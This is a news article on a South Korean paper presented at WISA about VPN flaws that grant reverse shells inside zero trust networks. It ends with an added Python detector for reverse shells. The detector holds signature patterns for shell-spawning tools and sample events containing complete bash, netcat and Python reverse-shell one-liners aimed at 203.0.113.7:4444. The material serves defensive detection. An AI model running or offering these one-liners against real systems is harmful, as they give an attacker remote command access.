As the shift toward a zero trust security model gains momentum in the United States and beyond, South Korean researchers have found that existing network safeguards such as virtual private networks (VPNs) still pose a security risk to the emerging framework.
In a series of experiments using configurations of current VPN equipment, the researchers breached a zero trust environment and gained administrative access that let them remotely infiltrate systems behind it.
Kim Eunyoung, a Principal Researcher at the National Security Research Institute’s (NSR) Cyber Security Research Division, unveiled her latest findings at the World Conference on Information Security Applications (WISA). The conference was held from August 23 to 25 on Jeju Island, South Korea. Collaborating with her on this research was Sohn Kiwook, a Computer Science and Engineering professor at Seoul National University of Science and Technology, who previously served as a director at NSR.
In a research paper published through WISA, titled “Research on Security Threats Using VPN in Zero Trust Environments,” the two researchers carried out a series of experiments and firmware analyses. Their goal was to pinpoint security vulnerabilities in Zero Trust Network Access (ZTNA) systems, with a particular focus on current network equipment.
“Despite the adoption of zero trust in many network environments, existing firewall or VPN devices are still in use,” said Kim while introducing the research. “We attempted to examine potential security threats that zero trust environments may encounter due to vulnerabilities in these existing network devices and propose countermeasures to mitigate such threats,” she elaborated.
The U.S. National Institute of Standards and Technology (NIST) defines zero trust as “the term for an evolving set of cybersecurity paradigms that move defenses from static, network-based perimeters to focus on users, assets, and resources.” Interest in the security framework has surged within global tech circles ever since the Biden administration signaled its intention to adopt zero trust policies through an executive order aimed at bolstering the nation’s cybersecurity in May 2021.
According to the researchers, the zero trust maturity model published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) consists of five pillars: identity, device, network and environment, application workload, and data. “Although the five pillars provide a solid foundation for organizations to improve their security posture, there is no one-size-fits-all approach,” explained Kim. The researcher went on, adding that “most of the proposed models for zero trust have primarily focused on access control for end devices and access data by strengthening user authentication.”
Starting from the premise that security threats could still arise under a zero trust framework, Kim and Sohn ran simulations of vulnerability-driven attack scenarios. They compared two reference architectures, Google’s BeyondCorp and Netflix’s Location Independent Security Approach (LISA). To validate their findings, the researchers focused on models similar to LISA, which keep existing network devices in the design and could therefore inherit those devices’ disclosed or undisclosed vulnerabilities. This contrasts with the BeyondCorp approach, which removes VPNs and firewalls from the design altogether.
Additionally, the researchers put one company’s VPN equipment under the microscope and discovered a flaw that “allows an attacker to obtain a reverse shell by executing a command that connects to it” even within a zero trust framework. In a reverse shell, the compromised device, rather than the attacker, initiates the connection: a command-execution flaw is used to make the target open an outbound connection to an attacker-controlled host and attach a command shell to it. Because the traffic is outbound, it often passes through egress rules that would block an inbound login, and once the shell runs under an administrative account the attacker holds that account’s privileges on the device.
“Although ordinary users may not have a significant impact on the system as a whole, even if they are subject to hacking attacks from external sources in a zero trust environment, vulnerability attacks on users with administrator privileges can cause many problems throughout the system,” warned Kim. “When introducing the new zero trust framework, real-time monitoring of abnormal user behavior and security measures should be reviewed for all network equipment rather than simply strengthening user authentication with a more robust policy.”
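The reverse-shell flaw described above and Kim’s call for real-time monitoring of abnormal behaviour are the kind of thing a host-based detection rule can catch. What follows is an added example written for this page, not code from the WISA paper or from the NSR researchers: it scans process-execution events for command lines that bind a shell’s standard streams to an outbound socket, and for shells or interpreters spawned by network services that should never spawn them, escalating the alert when the account involved is privileged. The `ExecEvent` record shape, the sample events, the list of service parents and the set of privileged accounts are all constructed assumptions for illustration.

```python
"""Reverse-shell detection over process-execution events (added example).

Assumptions (not from the paper): events carry host, user, parent image and
full command line; the sample records below are constructed, and the
privileged-account and service-parent lists are placeholders a real
deployment would take from its own inventory.
"""
import os
import re
import shlex
from dataclasses import dataclass, field


@dataclass
class ExecEvent:
    host: str
    user: str
    parent: str   # image name of the parent process
    cmdline: str  # full command line of the new process


@dataclass
class Alert:
    host: str
    user: str
    cmdline: str
    reasons: list = field(default_factory=list)
    severity: str = "high"


# Command-line signatures of common reverse-shell launchers: a shell whose
# stdio is redirected to a socket, or a tool that execs a shell on connect.
PATTERNS = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/[\w.:-]+/\d+")),
    ("netcat_exec", re.compile(r"\b(nc|ncat|netcat)\b[^|;&]*\s(-[a-zA-Z]*[ec]\b|--(sh-)?exec\b)")),
    ("socat_exec", re.compile(r"\bsocat\b.*\bexec:", re.I)),
    ("python_dup2", re.compile(r"\bsocket\b.*\bconnect\(.*\bdup2\(", re.S)),
    ("perl_sock", re.compile(r"\bperl\b.*\bsocket\(.*\bexec\(", re.S)),
    ("mkfifo_pipe", re.compile(r"\bmkfifo\b.*\|\s*(ba|z|da)?sh\b.*\|\s*(nc|ncat)\b", re.S)),
]

# Assumed: services on a VPN appliance that have no business spawning these.
SERVICE_PARENTS = {"httpd", "nginx", "vpnd", "java", "sshd-session"}
SPAWN_SUSPECTS = {"sh", "bash", "dash", "zsh", "ash",
                  "python", "python3", "perl", "nc", "ncat", "socat"}
# Assumed: accounts whose compromise affects the whole device (see Kim's point).
PRIVILEGED_USERS = {"root", "admin"}


def argv0(cmdline: str) -> str:
    """Return the basename of the executed program, tolerating odd quoting."""
    try:
        parts = shlex.split(cmdline)
    except ValueError:
        parts = cmdline.split()
    return os.path.basename(parts[0]) if parts else ""


def inspect(event: ExecEvent) -> list:
    """Return the list of reasons an event looks like a reverse shell."""
    reasons = [name for name, rx in PATTERNS if rx.search(event.cmdline)]
    if event.parent in SERVICE_PARENTS and argv0(event.cmdline) in SPAWN_SUSPECTS:
        reasons.append("unexpected_child_of_service")
    return reasons


def detect(events) -> list:
    """Turn suspicious events into alerts; privileged accounts raise severity."""
    alerts = []
    for ev in events:
        reasons = inspect(ev)
        if reasons:
            sev = "critical" if ev.user in PRIVILEGED_USERS else "high"
            alerts.append(Alert(ev.host, ev.user, ev.cmdline, reasons, sev))
    return alerts


def sample_events() -> list:
    """Constructed sample telemetry: two benign records and three reverse shells."""
    return [
        ExecEvent("vpn-gw-1", "admin", "httpd",
                  "bash -i >& /dev/tcp/203.0.113.7/4444 0>&1"),
        ExecEvent("vpn-gw-1", "admin", "sshd-session",
                  "tail -n 50 /var/log/messages"),
        ExecEvent("jump-1", "jdoe", "bash",
                  "nc -e /bin/sh 203.0.113.7 4444"),
        ExecEvent("web-2", "www-data", "nginx",
                  '''python3 -c "import socket,os,pty;s=socket.socket();'''
                  '''s.connect(('203.0.113.7',4444));'''
                  '''[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn('/bin/sh')"'''),
        ExecEvent("vpn-gw-1", "admin", "bash",
                  "nc -l -p 4444"),  # a listener, not a call-back: stays quiet
    ]


if __name__ == "__main__":
    for a in detect(sample_events()):
        print(f"[{a.severity}] {a.host} user={a.user} {a.reasons}: {a.cmdline[:60]}")
```

The two heuristics are deliberately independent: the signature list catches the command that creates the call-back, while the parent-process rule catches a shell or interpreter appearing under a web or VPN daemon even when the command line is obfuscated. In a real deployment the events would come from auditd, eBPF or an EDR agent rather than a constructed list, and the privileged-account set from the device’s own user database.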